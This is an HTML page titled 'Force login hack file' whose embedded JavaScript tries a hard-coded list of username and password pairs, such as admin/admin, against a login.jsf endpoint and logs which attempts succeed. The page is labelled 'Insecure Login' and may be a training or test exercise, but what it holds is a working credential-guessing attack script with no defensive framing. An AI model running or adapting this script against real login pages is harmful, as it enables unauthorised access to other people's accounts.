<html>
    <head>
        <title>Force login hack file:</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <script type="text/javascript">
            function person(login, password){
                return {
                    login: login,
                    password: password
                }
            }
            
            function prepareData(){
                var personArray = new Array();
                var p1 = new person("admin", "admin");
                var p2 = new person("aaa", "aaa");
                var p3 = new person("user", "kasia12");
                var p4 = new person("skt", "pass");
                var p5 = new person("hello", "pass");
                var p6 = new person("zbyszko", "zbyszko");
                var p7 = new person("aev", "afcf");
                personArray.push(p1, p2, p3, p4, p5, p6);
                return personArray;
            }
            function ajaxRequest(){
                var activexmodes=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"] //activeX versions to check for in IE
                if (window.ActiveXObject){ //Test for support for ActiveXObject in IE first (as XMLHttpRequest in IE7 is broken)
                    for (var i=0; i<activexmodes.length; i++){
                        try{
                            return new ActiveXObject(activexmodes[i])
                        }
                        catch(e){
                            //suppress error
                        }
                    }
                }
                else if (window.XMLHttpRequest) // if Mozilla, Safari etc
                    return new XMLHttpRequest();
                else
                    return false
            }
            
            function doIt() {
                var personArray = prepareData();
                
                for(var i=0; i<personArray.length; i++) {
                    var mygetrequest=new ajaxRequest();
                    mygetrequest.onreadystatechange=function(){
                        if (mygetrequest.readyState==4){
                            if (mygetrequest.status==200 || window.location.href.indexOf('http')==-1){
                                document.getElementById('result').innerHTML = mygetrequest.responseText;
                            }
                            else{
                                alert('An error has occured making the request: ' + mygetrequest.status);
                            }
                        }
                    }; 
                    var login=encodeURIComponent(personArray[i].login);
                    var password=encodeURIComponent(personArray[i].password);
                    mygetrequest.open('GET', 'login.jsf?logininput=' + login + '&passinput=' + password, true);
                    mygetrequest.send(null);
                    
                    //console.log(login + " " + password);
                    //console.log(mygetrequest);
//                    var div = document.createElement('div');
//                    div.setAttribute("name", login);
//                    div.innerHTML = mygetrequest.responseText;
//                    document.body.appendChild(div);
                    //document.getElementById('result').appendChild(txt); 
                                 var z = mygetrequest.responseText;
                                var z1 = z.indexOf("false") !== -1 ? true : false ;
                                //z.getElementsByTagName("body");
                                console.log(i + " -> "+ z1);
                }
            }
        </script>
    </head>
    <body>

        <h1>Insecure Login: </h1>
        <input type="submit" value="Start" onclick="doIt()"/>

        <div id="result"></div> 
    </body>
</html>
